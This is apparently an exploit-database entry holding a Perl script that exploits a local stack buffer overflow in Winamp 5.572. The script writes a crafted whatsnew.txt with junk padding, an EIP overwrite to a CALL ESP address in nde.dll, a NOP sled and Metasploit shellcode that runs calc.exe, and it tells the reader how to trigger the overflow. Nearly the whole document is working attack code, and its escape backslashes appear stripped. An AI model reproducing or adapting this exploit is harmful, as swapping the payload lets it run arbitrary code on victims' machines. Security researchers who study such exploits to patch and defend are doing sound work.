Text :  

# Exploit Title: Winamp 5.572 local buffer overflow
# Date: 25-01-2010
# Author: NeoCortex - PoC by Debug
http://www.exploit-db.com/exploits/11248
# Software Link: http://www.exploit-db.com/application/11248
# Version: 5.572
# Tested on: WinXP SP3 De

#!/usr/bin/perl

# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print "n#########################################n";
print "# Winamp 5.572 stack buffer overflow #n";
print "# PoC by: Debug (eldadru@gmail.com) #n";
print "# Exploit by: NeoCortex (ICQ 158005940) #n";
print "#########################################n";

print " __ __________________n";
print " ________ / \ / / ____ / ____ /
________n";
print " ________ /_______/ / /\ \ / / /___/ / / / / /_______/
________ n";
print " /_______/ _______ / / \ \ / / /_____/ / / / ________
/_______/n";
print " /_______/ / / \ \/ / /_____/ /___/ /
/_______/n";
print " /_/ \__/_______/_______/n";
print " Where's the next phone box to the matrix
please?nnn";



my $version = "Winamp 5.572";

my $junk = "x41" x 540;
my $eip = "xadx86x0ex07"; # overwrite EIP - 070E86AD FFD4 CALL
ESP nde.dll
my $nop = "x90" x 100;

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47".
"x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32".
"x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a".
"x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e".
"x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54".
"x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64".
"x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f".
"x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f".
"x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d".
"x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44".
"x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35".
"x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a".
"x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b".
"x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57".
"x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b".
"x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63".
"x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59".
"x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73".
"x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63".
"x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33".
"x30x47";

open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;

print "[+] whatsnew.txt written.n";
print "[ ] Now copy it to your winamp folder...n";
print "[ ] Run winamp and hit [About Winamp]->[Version
History]n";

  References :  

None